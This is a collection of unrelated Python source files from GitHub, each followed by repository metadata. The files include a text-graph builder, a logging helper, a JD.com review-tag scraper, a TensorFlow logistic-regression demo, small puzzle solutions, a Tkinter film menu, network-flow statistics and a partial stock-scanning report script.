    doc = doc.split()[:max_seq_len]
    # Right-pad the token list with "<pad>" up to max_seq_len.
    doc_words = ["<pad>" for _ in range(max_seq_len)]
    doc_words[:len(doc)] = doc[:]
    features = []
    for key in range(len(doc_words)):
        if doc_words[key] in word_embeddings:
            features.append(word_embeddings[doc_words[key]])
        else:
            # Out-of-vocabulary (and "<pad>") tokens use the fixed random
            # vector assigned to their vocab slot.
            features.append(oov[vocab.index(doc_words[key]), :])
    features = np.array(features)
    # Graph is built from the unpadded tokens; padded rows remain zero.
    adj_matrix = dependency_adj_matrix(doc, max_len=max_seq_len)
    one_hot = [0 for l in range(len(label_set))]
    label_index = label_set.index(labels[i])
    one_hot[label_index] = 1
    all_features.append(features)
    all_graphs.append(adj_matrix)
    all_labels.append(np.array(one_hot))
    # Sentence as vocab indices (includes the "<pad>" index).
    sentence = []
    for k in range(max_seq_len):
        sentence.append(vocab.index(doc_words[k]))
    all_sentences.append(sentence)

# Persist everything for the training pipeline.
with open("data/mr/mr.all.features", 'wb') as f:
    pkl.dump(all_features, f)
with open("data/mr/mr.all.adj", 'wb') as f:
    pkl.dump(all_graphs, f)
with open("data/mr/mr.all.label", 'wb') as f:
    pkl.dump(all_labels, f)
with open("data/mr/mr.all.sentence", 'wb') as f:
    pkl.dump(all_sentences, f)
with open("data/mr/mr.all.vocab", 'wb') as f:
    pkl.dump(vocab, f)
MathIsAll/HDGCN-pytorch
build_fixed_graph.py
build_fixed_graph.py
py
7,500
python
en
code
5
github-code
36
41573028205
import logging


def get_logger():
    """Return the root logger configured with a timestamped stream handler.

    Also silences matplotlib's noisy ``font_manager`` logger.  The handler
    is attached only if the root logger has none yet: the previous version
    added a fresh ``StreamHandler`` on every call, so calling
    ``get_logger()`` more than once printed each record multiple times.

    Returns:
        logging.Logger: the process-wide root logger, at DEBUG level.
    """
    logging.getLogger('matplotlib.font_manager').setLevel(logging.WARNING)
    logger = logging.getLogger()
    logger.setLevel(logging.DEBUG)
    if not logger.handlers:  # idempotent: don't stack duplicate handlers
        formatter = logging.Formatter(
            '%(asctime)s - %(name)s - %(levelname)s: - %(message)s',
            datefmt='%Y-%m-%d %H:%M:%S')
        ch = logging.StreamHandler()
        ch.setLevel(logging.DEBUG)
        ch.setFormatter(formatter)
        logger.addHandler(ch)
    return logger
TitusWjt/class3
utils/log.py
log.py
py
474
python
en
code
0
github-code
36
20420839973
# -*- coding: utf-8 -*-
# Multi-threaded crawler: fetch JD.com hot-comment tags for product ids
# listed in rest_idx.txt and append them to per-product text files.
from threading import Thread
import queue
import json
import os , sys
# requests: HTTP requests / page fetching
import requests
# time: sleep between crawls
import time
# random: randomized sleep jitter
import random
# re: extract information from page source
import re
# numpy: general numeric work
import numpy as np
from PIL import Image
from wordcloud import WordCloud
# pandas: table joins and aggregation
import pandas as pd
# matplotlib: data visualization
import matplotlib.pyplot as plt
# jieba: Chinese word segmentation
import jieba as jb
# jieba.analyse: keyword extraction
import jieba.analyse

# Input file: tab-separated lines whose second field is a product URL.
f=open("rest_idx.txt", 'r')

# Request headers (browser User-Agent + Referer to look like a JD visit).
headers = {'User-Agent':'Mozilla/5.0 '
                        '(Windows NT 10.0; Win64; x64) '
                        'AppleWebKit/537.36 (KHTML,'
                        ' like Gecko) Chrome/76.0.3809.132 '
                        'Safari/537.36',
           #'Accept':'text/html;q=0.9,*/*;q=0.8',
           #'Accept-Charset':'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
           #"Accept-Language": "zh-CN,zh;q=0.9",
           #'Connection':'close',
           'Referer':'https://www.jd.com/'
           }

q = queue.Queue()
NUM = 5    # worker thread count
JOBS = 10  # number of jobs queued
#cookies=***


def crawl_jd_cmt_tag(prdtId):# change for url
    """Fetch the JSONP comment-tag feed for one product id and append each
    (tag name, count) pair to a per-product file under comment_tag_path."""
    url=r"https://sclub.jd.com/comment/" \
        r"productPageComments.action?callback=fetchJSON_comment98vv106813&" \
        r"productId={}&" \
        r"score=0&sortType=5&page=0&pageSize=10&isShadowSku=0&fold=1".format(prdtId)
    comment_tag_path = r'C:\TC-prog\JetBrain_pycharm_TC' \
                       r'\PycharmProjects\Crawler_EEFinal' \
                       r'\jd_cmt_tags\httpsitem.jd.com{}.html.txt'.format(prdtId)
    try:
        r=requests.get(url,headers=headers,timeout=5)
        r.raise_for_status()
    except:
        # NOTE(review): on failure this only prints; ``r`` is then
        # undefined below and the later bare except swallows the error.
        print ('爬取失败')
    # Strip the JSONP wrapper: keep text after the last '(' and drop ');'.
    raw = r.text[:]
    pos = 0
    for i in range(len(raw)):
        if raw[i] == '(':
            pos = i
    try:
        # data0 = re.sub(u'^fetchJSON_comment98vv106813\(', '', html)
        r_json_str = r.text[pos + 1:-2]
        # print (r_json_str)
        r_json_obj=json.loads(r_json_str,strict=False)
        print (r_json_obj)
        r_json_tags=r_json_obj['hotCommentTagStatistics']
        print ('狗东评论标签:')
        # append mode, one line per tag
        for r_json_tag in r_json_tags:
            with open(comment_tag_path,'a+') as file:
                file.write(r_json_tag['name']+ '\t'+str(r_json_tag['count'])+'\n')
            print(r_json_tag['name']+ '\t'+str(r_json_tag['count']))
    except:
        print('failed')


def run():
    """Iterate over the shared input file, extract each product id from its
    URL and crawl it, sleeping a random 0-3 s between requests."""
    global f
    for line in f.readlines():
        try:
            pp = line.split('\t')
            webpage = pp[1].strip('\n')
            print(webpage)
            # Slice off scheme/prefix and suffix, then keep what follows
            # the last 'm' (i.e. after ".com") as the numeric item id.
            temp = webpage[14:-5]
            pos = 0
            for i in range(len(temp)):
                if temp[i] == 'm':
                    pos = i
            itemID = temp[pos + 1:]
            if (len(webpage) > 35):
                continue
            crawl_jd_cmt_tag(itemID)
            time.sleep(random.random() * 3)
        except:
            print("Invalid Input!")


def working():
    """Worker loop for the thread pool."""
    # NOTE(review): q.get() is commented out, so task_done() is called
    # without a matching get() and all workers share the same file handle.
    while True:
        #arguments = q.get()
        run()
        q.task_done()


# fork NUM threads waiting on the queue
for i in range(NUM):
    t = Thread(target=working)
    t.setDaemon(True)
    t.start()
# enqueue JOBS jobs
for i in range(JOBS):
    q.put(i)
# block until all JOBS are done
q.join()
f.close()
ltzone/EE208Lab
jd_cmt_tags/_jd_cmt_TAGS.py
_jd_cmt_TAGS.py
py
3,546
python
en
code
0
github-code
36
23258044940
# Logistic-regression loss, gradient and Hessian: once with TensorFlow 1.x
# autodiff, once in closed form with NumPy, printed for comparison.
import tensorflow as tf
import numpy as np

sess = tf.Session()

# Placeholders: 100 samples, 3 features, binary targets, 3 weights.
X = tf.placeholder(tf.float32, shape=(100, 3))
y = tf.placeholder(tf.float32, shape=(100))
beta = tf.placeholder(tf.float32, shape=(3))

# p = sigmoid(X @ beta); Loss = negative log-likelihood.
p = tf.math.sigmoid(tf.tensordot(X, beta, 1))
Loss = -tf.math.reduce_sum(y * tf.math.log(p) + ((1. - y) * tf.math.log(1.-p)))
# First and second derivatives of the loss w.r.t. beta via autodiff.
dL = tf.gradients(Loss, beta)
ddL = tf.hessians(Loss, beta)

# Random problem instance.
rand_X = np.random.uniform(-1, 1, (100,3))
rand_y = np.random.randint(0, 2, 100)
rand_beta = np.random.uniform(-1, 1, 3)
print(sess.run([Loss, dL, ddL], feed_dict={beta: rand_beta, X: rand_X, y: rand_y}))

# Dump the graph for TensorBoard inspection.
writer = tf.summary.FileWriter('logs', sess.graph)
writer.close()


def numpy_equations(X, beta, y):
    """Closed-form counterparts of the TF graph above.

    Returns (L, dL, ddL): the negative log-likelihood, its gradient
    X^T (p - y), and its Hessian X^T W X with W = diag(p * (1 - p)).
    """
    p = 1. / (1. + np.exp(-np.dot(X, beta)))
    L = -np.sum(y * np.log(p) + ((1. - y) * np.log(1.-p)))
    dL = np.dot(X.T, p - y)
    W = np.identity(X.shape[0]) * p * (1. - p)
    ddL = np.dot(X.T, np.dot(W, X))
    return L, dL, ddL


print(numpy_equations(rand_X, rand_beta, rand_y))
MarcToussaint/AI-lectures
MachineLearning/nn-exercise/getting_started.py
getting_started.py
py
987
python
en
code
67
github-code
36
34601010887
# Implement the function unique_in_order which takes as argument a sequence and returns a list of items without any elements with the same value next to each other and preserving the original order of elements.

# For example:
# unique_in_order('AAAABBBCCDAABBB') == ['A', 'B', 'C', 'D', 'A', 'B']
# unique_in_order('ABBCcAD') == ['A', 'B', 'C', 'c', 'A', 'D']
# unique_in_order([1,2,2,3,3]) == [1,2,3]


def unique_in_order(iterable):
    """Return *iterable*'s items as a list with consecutive duplicates collapsed.

    Works for any iterable (strings, lists, ...). Order is preserved and
    comparison is case-sensitive; only runs of adjacent equal items are
    reduced to their first element.
    """
    result = []
    for item in iterable:
        # Keep the item unless it repeats the one just kept; `not result`
        # admits the very first element.
        if not result or item != result[-1]:
            result.append(item)
    return result


print(unique_in_order('aAAabCCcdeFFgH'))
raqune89/CodeWars
Unique In Order.py
Unique In Order.py
py
738
python
en
code
0
github-code
36
38715815112
#!/usr/bin/env python3

# Advent of Code 2016 day 2, part 2: walk a diamond-shaped keypad.
# None marks grid cells that are off the pad.
pad = (
    (None, None, '1', None, None),
    (None, '2', '3', '4', None),
    ('5', '6', '7', '8', '9'),
    (None, 'A', 'B', 'C', None),
    (None, None, 'D', None, None)
)

# Start on the '5' key.
row = 2
col = 0
combo = []

# Each instruction letter maps to a (row, col) step; anything else is a no-op.
MOVES = {'U': (-1, 0), 'D': (1, 0), 'L': (0, -1), 'R': (0, 1)}

with open('input.txt', 'r') as f:
    for line in f:
        for c in line.strip():
            dr, dc = MOVES.get(c, (0, 0))
            # Clamp to the 5x5 grid, then only commit the move if the
            # target cell is a real key.
            nr = min(4, max(0, row + dr))
            nc = min(4, max(0, col + dc))
            if pad[nr][nc] is not None:
                row, col = nr, nc
        # One key per instruction line.
        combo.append(pad[row][col])

print(''.join(combo))
lvaughn/advent
2016/2/combo_lock_2.py
combo_lock_2.py
py
981
python
en
code
1
github-code
36
74329032423
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations import django.utils.timezone import django_extensions.db.fields class Migration(migrations.Migration): dependencies = [ ] operations = [ migrations.CreateModel( name='Station', fields=[ ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')), ('created', django_extensions.db.fields.CreationDateTimeField(blank=True, verbose_name='created', editable=False, default=django.utils.timezone.now)), ('modified', django_extensions.db.fields.ModificationDateTimeField(blank=True, verbose_name='modified', editable=False, default=django.utils.timezone.now)), ('name', models.TextField()), ], options={ 'ordering': ('-modified', '-created'), 'get_latest_by': 'modified', 'abstract': False, }, ), ]
opendata-stuttgart/metaEFA
meta_efa/main/migrations/0001_initial.py
0001_initial.py
py
1,045
python
en
code
33
github-code
36
4656654500
__author__ = 'Giuliano'
# Tkinter demo: a window with one button per film; clicking a button
# recolors the window and prints the chosen film (messages in Dutch).
import tkinter as tk
from tkinter import *

root = tk.Tk()
root.geometry("400x650")
root.configure(background='orange')


class Application(tk.Frame):
    # Main frame holding the six film buttons plus a QUIT button.

    def __init__(self, master=None):
        tk.Frame.__init__(self, master)
        self.configure(background='orange')
        self.pack()
        # Build one button per film (Film6 also adds the QUIT button).
        self.check_in_Film1()
        self.check_in_Film2()
        self.check_in_Film3()
        self.check_in_Film4()
        self.check_in_Film5()
        self.check_in_Film6()
        # Center the 400x650 window on the screen.
        w = 400
        h = 650
        ws = root.winfo_screenwidth()
        hs = root.winfo_screenheight()
        x = (ws/2) - (w/2)
        y = (hs/2) - (h/2)
        root.geometry('%dx%d+%d+%d' % (w, h, x, y))

    # NOTE(review): each builder below overwrites self.check_in; the widgets
    # stay alive because pack() keeps a reference.
    def check_in_Film1(self):
        self.check_in = tk.Button(self)
        self.check_in["text"] = "The Martian"
        self.check_in["command"] = self.say_choice_film1
        self.check_in.pack(side="top")

    def check_in_Film2(self):
        self.check_in = tk.Button(self)
        self.check_in["text"] = "Star Wars"
        self.check_in["command"] = self.say_choice_film2
        self.check_in.pack(side="top")

    def check_in_Film3(self):
        self.check_in = tk.Button(self)
        self.check_in["text"] = "007: Spectre"
        self.check_in["command"] = self.say_choice_film3
        self.check_in.pack(side="top")

    def check_in_Film4(self):
        self.check_in = tk.Button(self)
        self.check_in["text"] = "Lord of the Rings: The Fellowship"
        self.check_in["command"] = self.say_choice_film4
        self.check_in.pack(side="top")

    def check_in_Film5(self):
        self.check_in = tk.Button(self)
        self.check_in["text"] = "Kill Bill 2"
        self.check_in["command"] = self.say_choice_film5
        self.check_in.pack(side="top")

    def check_in_Film6(self):
        self.check_in = tk.Button(self)
        self.check_in["text"] = "The Ring"
        self.check_in["command"] = self.say_choice_film6
        self.check_in.pack(side="top")
        # QUIT button pinned to the top-left corner.
        self.QUIT = tk.Button(self, text="QUIT", fg="red",
                              command=root.destroy)
        self.QUIT.pack(side="bottom")
        self.QUIT.place(x=0, y=0)

    # Click handlers: recolor the window and print the selection.
    def say_choice_film1(self):
        root.configure(background="yellow")
        print("U heeft gekozen voor The Martian")

    def say_choice_film2(self):
        root.configure(background="black")
        print("U heeft gekozen voor Star Wars")

    def say_choice_film3(self):
        root.configure(background="black")
        print("U heeft gekozen voor 007: Spectre")

    def say_choice_film4(self):
        root.configure(background="black")
        print("U heeft gekozen voor Lord of the Rings: The Fellowship")

    def say_choice_film5(self):
        root.configure(background="black")
        print("U heeft gekozen voor Kill Bill 2")

    def say_choice_film6(self):
        root.configure(background="black")
        print("U heeft gekozen voor The Ring")

    #
    # def show_img(self):
    #     load = Image.open('img/martian.jpg')
    #     render = ImageTk.


def white(*args,**kwargs):
    # Reset the window to its initial orange background.
    # NOTE(review): defined but never bound to any event in this file.
    root.configure(background="orange")


app = Application(master=root)
root.mainloop()
Alexanderkorn/A3-project
code/raster.py
raster.py
py
3,162
python
en
code
0
github-code
36
37314300998
# -*- coding:utf-8 -*-
from openpyxl import Workbook
from datetime import datetime


def write_excel(filename):
    """Create a small demo workbook and save it to *filename*.

    Writes a float, today's date and a formula into column A of a sheet
    named 'Pi', then appends one numeric row and a small 3x3 table.
    """
    wb = Workbook()
    # load_work(filename)
    ws = wb.create_sheet('sheet', 0)
    # Workbook.remove() expects a worksheet object, not a title string;
    # the original ``wb.remove('sheet')`` raised ValueError. Drop the
    # sheet we just created by passing the object itself.
    wb.remove(ws)
    ws = wb.active  # default sheet created by Workbook()
    ws.title = 'Pi'
    ws['A1'] = 3.1415926
    ws['A2'] = datetime.now().strftime('%Y-%m-%d')
    ws['A3'] = '=sum(A1:A5)'  # stored as a formula, evaluated by Excel
    row = [1, 2, 3, 4]
    ws.append(row)
    rows = [
        ['id', 'name', 'department'],
        ['001', 'lee', 'cs'],
        ['002', 'lee', 'ma']
    ]
    # append() adds exactly ONE row per call; the original passed the whole
    # list-of-lists in a single call, which is not a valid row payload.
    for r in rows:
        ws.append(r)
    wb.save(filename)
huazhicai/Demo
openpyxl/demo2.py
demo2.py
py
580
python
en
code
0
github-code
36
31345155935
import csv


def _write_rows(path, rows):
    """Write (key, value) rows to *path* as CSV.

    Uses a ``with`` block so the handle is closed even on error (the
    original opened/closed files manually) and ``newline=''`` as required
    by the csv module to avoid doubled line endings on Windows.
    """
    with open(path, "w", newline="") as out:
        writer = csv.writer(out, delimiter=',', quotechar='|',
                            quoting=csv.QUOTE_MINIMAL)
        writer.writerows(rows)


def get_flow_size_in_packets(tcpflows, udpflows):
    """Write one CSV per protocol mapping flow key -> packet count."""
    _write_rows("tcp_flow_size_packets.csv",
                ((k, len(v)) for k, v in tcpflows.items()))
    # note: original output name is singular 'packet' for UDP — kept as-is
    _write_rows("udp_flow_size_packet.csv",
                ((k, len(v)) for k, v in udpflows.items()))


def get_flow_size_in_bytes(tcpflows, udpflows):
    """Write one CSV per protocol mapping flow key -> total frame bytes."""
    def total_bytes(packets):
        # each packet dict carries its capture length under "frame.len"
        return sum(int(p["frame.len"]) for p in packets)

    _write_rows("tcp_flow_size_bytes.csv",
                ((k, total_bytes(v)) for k, v in tcpflows.items()))
    _write_rows("udp_flow_size_bytes.csv",
                ((k, total_bytes(v)) for k, v in udpflows.items()))


def get_flow_header_overhead(tcpflows):
    """Write flow key -> (header bytes / payload bytes) for TCP flows.

    Header bytes = TCP header + IP header + link-layer framing (frame
    length minus the IP packet). Flows with zero payload get the legacy
    sentinel ratio 9999.
    """
    rows = []
    for key, packets in tcpflows.items():
        total_headers_size = 0
        total_data_sent = 0
        for pkt in packets:
            tcp_header_len = int(pkt["tcp.hdr_len"])
            # "tcp.len" may be non-numeric in the capture export; treat
            # that as an empty payload (matches original behavior)
            tcp_payload_len = int(pkt["tcp.len"]) if pkt["tcp.len"].isdigit() else 0
            ip_header_len = int(pkt["ip.hdr_len"])
            frame_len = int(pkt["frame.len"])
            ip_packet_size = tcp_header_len + tcp_payload_len + ip_header_len
            total_headers_size += tcp_header_len + ip_header_len + (frame_len - ip_packet_size)
            total_data_sent += tcp_payload_len
        if total_data_sent == 0:
            rows.append((key, 9999))
        else:
            rows.append((key, float(total_headers_size / total_data_sent)))
    _write_rows("tcp_flow_overhead_ratio.csv", rows)
David47295/d58courseproject
d58/flow_size.py
flow_size.py
py
2,457
python
en
code
0
github-code
36
12227662181
#!/home/mcollier/miniconda3/bin/python
# -*- coding: utf-8 -*-

# Nightly market scan: queries MySQL for S&P500 breadth metrics, finds
# long/short candidates, and renders an HTML report plus per-ticker bokeh
# candlestick/MACD pages.
# NOTE(review): all SQL below is built with str.format() rather than
# parameterized queries; acceptable only because inputs are local/trusted.

__author__ = "Matthew Collier"
__version__ = "0.5"

# Typical use cases:
#hf> /media/mcollier/ONYX/ONYX/W/portfolio/scripts/scan.py -v
#hf> /media/mcollier/ONYX/ONYX/W/portfolio/scripts/scan_db.py -s WMT
#hf> /media/mcollier/ONYX/ONYX/W/portfolio/scripts/scan_db.py -d 2017-11-03

##############################################################################
# TBD:                                                                       #
#   * Add total volume and range for S&P500 broad metrics                    #
#   * relativize the entire project's paths                                  #
#   * improve documentation                                                  #
##############################################################################

# standard python library imports
import argparse
import collections
import datetime as dt
from math import pi
import os

# third party python imports
from bs4 import BeautifulSoup       # conda install beautifulsoup4
from bokeh.embed import file_html   # conda install bokeh
from bokeh.io import output_file, save
from bokeh.layouts import column
from bokeh.models import Legend
from bokeh.plotting import figure, show
from bokeh.resources import CDN, INLINE
from pymysql import connect         # conda install pymysql
from pymysql.cursors import DictCursor
from pandas import read_sql_query as rsql  # conda install pandas

# overriding with local imports
home = "/home/mcollier/ONYX/wealth/portfolio"
os.chdir(os.path.join(home, "scripts"))
import common


##############################################################################
# Local User Function Definitions
##############################################################################
def get_broads(d_con, span, price_date, tids=[]):
    """
    INPUTS:
        d_con (mysql) - A pymysql database connection with dict() return
        span (str) - 'daily' or 'weekly'
        price_date (str) - Data in ISO 8601 standard as YYYY-MM-DD
        tids [list] - id's of tickers to include with default of all
    OUTPUT:
        Dictionary with metrics as keys, and sums as values
    """
    #span = "daily",
    #price_date = "2017-10-31",
    #tids = [1, 2, 5, 10, 20, 50, 100]
    tids = [str(tid) for tid in tids]
    cols = ["gt12", "gt26", "gt50", "ad"]  # which metrics to sum()
    # Build "SELECT SUM(col) AS col, ..." for every metric column; the
    # '##' placeholders survive the first .format() and are filled second.
    sql = ["SELECT " + ("SUM({}) AS ##,"*len(cols)).format(*cols)[:-1],
           "FROM {}_metrics".format(span),
           "WHERE price_date='{}'".format(price_date),
           "" if not tids else "AND symbol_id in {}".format(tuple(tids)),
           ';']
    sql = " ".join(sql)
    sql = sql.replace("##", "{}").format(*cols)
    with d_con.cursor() as cur:
        cur.execute(sql)
        broads = cur.fetchone()
    return broads


def get_sectors(n_con):
    """
    INPUTS:
        n_con (mysql) - A "normal" pymysql database connection
    OUTPUT:
        Dictionary with sectors as keys, and lists of ticker_id's as values
    """
    sectors = collections.defaultdict(list)
    with n_con.cursor() as n_cur:
        # only active symbols (flag='a')
        n_cur.execute("SELECT sector,id FROM symbols where flag='a';")
        results = n_cur.fetchall()
    for result in results:
        sectors[result[0]].append(result[1])
    return sectors


def get_longs(n_con, span, price_date):
    """
    INPUTS:
        n_con (mysql) - A "normal" pymysql database connection
        span (str) - 'daily' or 'weekly'
        price_date (str) - Data in ISO 8601 standard as YYYY-MM-DD
    OUTPUT:
        Returns a list of potential long candidates.
    """
    sql = ["SELECT symbol_id FROM {}_metrics".format(span),
           "WHERE price_date='{}'".format(price_date),
           "AND impulse>0",   # positive impulse
           "AND gt26<0"]      # below value zone
    with n_con.cursor() as n_cur:
        n_cur.execute(" ".join(sql))
        results = n_cur.fetchall()
    return [result[0] for result in results]


def get_shorts(n_con, span, price_date):
    """
    INPUTS:
        n_con (mysql) - A "normal" pymysql database connection
        span (str) - 'daily' or 'weekly'
        price_date (str) - Data in ISO 8601 standard as YYYY-MM-DD
    OUTPUT:
        Returns a list of potential short candidates.
    """
    sql = ["SELECT symbol_id FROM {}_metrics".format(span),
           "WHERE price_date='{}'".format(price_date),
           "AND impulse<0",   # negative impulse
           "AND gt26>0"]      # above value zone
    with n_con.cursor() as n_cur:
        n_cur.execute(" ".join(sql))
        results = n_cur.fetchall()
    return [result[0] for result in results]


def get_ticker_info(d_con, tid):
    """
    INPUTS:
        d_con (mysql) - A pymysql database connection with dict() return
        tid (int) - id of ticker
    OUTPUT:
        Dictionary with information about a ticker
        (keys: id, ticker, name, sector).
    """
    sql = ["SELECT id,ticker,name,sector FROM symbols",
           "WHERE id={}".format(tid),
           ";"]
    with d_con.cursor() as d_cur:
        d_cur.execute(" ".join(sql))
        info = d_cur.fetchone()
    return info


def report_individuals(n_con, price_date, tickers=[]):  # tickers=singles
    """
    INPUTS:
        n_con (mysql) - A "normal" pymysql database connection
        price_date (str) - Data in ISO 8601 standard as YYYY-MM-DD
        tickers () - A list of dictionaries, one per ticker.
    OUTPUT:
        HTML as a string: one preformatted row per ticker with links to
        its weekly/daily bokeh pages, history count, ATR/close ratio
        (CoV), closing price and sector.
    """
    msg = "{:>3s}, {:>8s}, {:>7s}, {:>6s}, {:5d}, {:5.3f}, {:8.3f}, {:<s}\n"
    url = "<a href='./{}/{}{}.html'> {:s} </a>"
    n_cur = n_con.cursor()
    html = ""
    for t in tickers:
        #t={'id': 7,'name':'Abbott Laboratories','sector':'Health Care','ticker': 'ABT'}
        n_cur.execute(
            ("SELECT count(*) FROM daily_data "
             "WHERE symbol_id={}").format(t['id'])
            )
        count = n_cur.fetchone()[0]
        n_cur.execute(
            ("SELECT atr13 FROM daily_metrics WHERE symbol_id={} "
             "AND price_date='{}';").format(t['id'], price_date)
            )
        atr13 = n_cur.fetchone()[0]
        n_cur.execute(
            ("SELECT close FROM daily_data WHERE symbol_id={} "
             "AND price_date='{}'").format(t['id'], price_date)
            )
        close = n_cur.fetchone()[0]
        ticker_id = str(t['id']).zfill(3)
        # links point at the files bokeh_pages() writes (w<id>/d<id>.html)
        weekly_url = url.format(price_date, 'w', t["ticker"], "weekly")
        daily_url = url.format(price_date, 'd', t["ticker"], "daily")
        html += msg.format(ticker_id, weekly_url, daily_url, t["ticker"],
                           count, atr13/close, close, t["sector"])
    return html


def bokeh_pages(d_con, span, price_date, att, tickers=[]):
    """
    INPUTS:
        d_con (pymysql) - MySQL connection returning a dictionary
        span (str) - 'daily' or 'weekly'
        price_date (str) - ISO 8601 date YYYY-MM-DD
        att (str) - attitude label ('longs'/'shorts'/'select');
                    NOTE(review): currently unused inside this function
        tickers (list) - List containing ticker IDs
    OUTPUT:
        HTML files on disk (one candlestick+MACD page per ticker).

    NOTE(review): the pandas queries below use the module-global ``n_con``
    connection, not the ``d_con`` argument.
    """
    # set up variables
    w = 12*60*60*1000  # half day in ms (bokeh bar width)
    if span == "weekly":
        w *= 7
    TOOLS = "crosshair,hover,pan,wheel_zoom,box_zoom,reset,save"
    data_sql = """SELECT d.price_date AS price_date, d.open AS open,
                  d.high AS high, d.low AS low, d.close AS close,
                  d.volume AS volume FROM {}_data d
                  INNER JOIN symbols sym ON d.symbol_id = sym.id
                  WHERE sym.ticker='{}' AND d.price_date>"{}"
                  ORDER BY d.price_date ASC;"""
    metrics_sql = """SELECT price_date, ema12, ema26, atr13, macdf, macds,
                     macdh, force2 FROM {}_metrics m
                     INNER JOIN symbols sym ON m.symbol_id = sym.id
                     WHERE sym.ticker='{}' AND m.price_date>"{}"
                     ORDER BY m.price_date ASC;"""
    # weekly pages align to the next Friday and look back ~52 weeks;
    # daily pages look back 60 calendar days
    if span == "weekly":
        price_date = common.get_dotw("next", "Friday", from_date=price_date)
        offset = 52*7 + 1
    else:
        offset = 60
    time_obj = dt.datetime.strptime(price_date, "%Y-%m-%d")
    start_date = (time_obj - dt.timedelta(days=offset)).date().isoformat()
    for ticker in tickers:  # tickers = longs # tickers = shorts
        # set up in-loop variables
        info = get_ticker_info(d_con, ticker)  # ticker = 69
        t = info["ticker"]
        D = rsql(data_sql.format(span, t, start_date), con=n_con,
                 index_col="price_date")
        D["date"] = D.index.to_series()
        inc = D.close > D.open   # up candles
        dec = D.open > D.close   # down candles
        M = rsql(metrics_sql.format(span, t, start_date), con=n_con,
                 index_col="price_date")
        M["date"] = M.index.to_series()
        # candlestick plot
        title = "{}, {} {}".format(price_date, span, t)
        p1 = figure(x_axis_type="datetime", tools=TOOLS, plot_height=618,
                    plot_width=1000, title = title+" Candlestick")
        p1.xaxis.major_label_orientation = pi/4
        p1.grid.grid_line_alpha = 0.3
        p1.segment(D.date, D.high, D.date, D.low, line_width=2, color="black")
        p1.vbar(D.date[inc], w, D.open[inc], D.close[inc],
                fill_color="#D5E1DD", line_color="black")
        p1.vbar(D.date[dec], w, D.open[dec], D.close[dec],
                fill_color="#F2583E", line_color="black")
        # bokeh.pydata.org/en/latest/docs/user_guide/tools.html#hovertool
        # ema26, ema12, 1atr, 2atr, 3atr linear overlays
        p1.line(M.date, M.ema26 + 3*M.atr13, legend="3 ATR", color="gray")
        p1.line(M.date, M.ema26 + 2*M.atr13, legend="2 ATR", color="dimgray")
        p1.line(M.date, M.ema26 + M.atr13, legend="1 ATR", color="black")
        p1.line(M.date, M.ema26, legend="ema26", color="green", line_width=4)
        p1.line(M.date, M.ema12, legend="ema12", color="green", line_width=2)
        p1.line(M.date, M.ema26 - M.atr13, legend="-1 ATR", color="black")
        p1.line(M.date, M.ema26 - 2*M.atr13, legend="-2 ATR", color="dimgray")
        p1.line(M.date, M.ema26 - 3*M.atr13, legend="-3 ATR",color="gray")
        p1.legend.location = "top_left"
        p1.legend.border_line_width = 2
        p1.legend.background_fill_color = "aliceblue"
        # second plot for macX family
        p2 = figure(x_axis_type="datetime", tools=TOOLS, plot_height=250,
                    plot_width=1000, title = title+" MACDx")
        p2.vbar(x=M.date, width=w, top=M.macdh, color="#CAB2D6")
        p2.line(M.date, M.macds, legend="macds", color="black", line_width=2)
        p2.line(M.date, M.macdf, legend="macdf", color="black", line_width=1)
        p2.legend.location = "top_left"
        p2.legend.border_line_width = 2
        p2.legend.background_fill_color = "aliceblue"
        # work with html: render the two plots, then inject research links
        # at the top of the <body> via BeautifulSoup
        report = file_html(column(p1,p2), resources=CDN, title=title)
        t_slash = t.replace('.', '/')
        url1 = "https://www.bloomberg.com/quote/{}:US".format(t_slash)
        url2 = "https://finance.google.com/finance?q={}".format(t)
        url3 = "https://www.reuters.com/finance/stocks/overview/{}".format(t)
        url4 = "http://shortsqueeze.com/?symbol={}".format(t.replace('.', ''))
        new = ("<h2> Research Links </h2>"
               "<ul><li><a href='{}'> Bloomberg </a>"
               "<li><a href='{}'> Google </a>"
               "<li><a href='{}'> Reuters </a>"
               "<li><a href='{}'> ShortSqueeze </a>"
               "</ul>").format(url1, url2, url3, url4)
        miso = BeautifulSoup(report, "html.parser")
        miso.body.insert(0, BeautifulSoup(new, "html.parser"))
        # file name is span initial + ticker id, e.g. "d69.html"
        with open("{}{}.html".format(span[0], ticker), "w") as f:
            f.write(str(miso))


##############################################################################
# Treat this file as a script if invoked as __main__
##############################################################################
if __name__ == "__main__":

    # load configuration from commented JSON into dictionary
    conf = common.get_config("/etc/local/hf.conf")

    # assign parsed commandline values to working objects
    p = argparse.ArgumentParser()
    p.add_argument("-d", "--date", default="today",
                   help="work with a particular date")
    p.add_argument("-s", "--select", default="",
                   help="pull select ticker(s)... i.e. -s 69,488")
    p.add_argument("-v", "--verbose", action="store_true",
                   help="print extra information on stdout")
#    p.add_argument("-N", "--no_insert", action="store_true",
#                   help="suppress db insertion if true")
#    p.add_argument("-R", "--no_report", action="store_true",
#                   help="option to suppress reporting at end")
    args = p.parse_args()
    # vprint is a no-op unless -v was given
    # NOTE(review): appears unused in the remainder of this file
    vprint = print if args.verbose else lambda *a, **k: None
    # two connections: d_con returns dict rows, n_con returns tuples
    d_con = connect(host=conf["db_host"], db=conf["db_name"],
                    user=conf["db_user"], passwd=conf["db_pass"],
                    cursorclass=DictCursor)
    n_con = connect(host=conf["db_host"], db=conf["db_name"],
                    user=conf["db_user"], passwd=conf["db_pass"])
    if args.date == "today":
        price_date = dt.datetime.today().date().isoformat()
    else:
        price_date = args.date  # price_date = "2017-11-10"

    ##########################################################################
    # S&P500 and Sector indicators, World Research
    ##########################################################################
    html = """<html><head></head><body>
    <center><em><b><h1><hr><hr>
    "Every true idealist is after money ---because money means freedom,
    and freedom, in the final analysis, means life." - Oscar Wilde
    <hr><hr></h1></b></em></center>
    <h2> Verify Processing </h2>
    <a href="../logs> Log Directory </a>
    <h2> Global Sweep </h2>
    <ul>
    <li> CNN <a href="http://money.cnn.com/data/world_markets/europe/">
    World Markets </a> Map & News
    <li> <a href="https://www.marketwatch.com/topics/columns/need-to-know">
    Headlines </a> (a brief glance only)
    </ul>\n"""
    head = "{:>6s}, {:>4s}, {:>4s}, {:>4s}, {:>4s}"
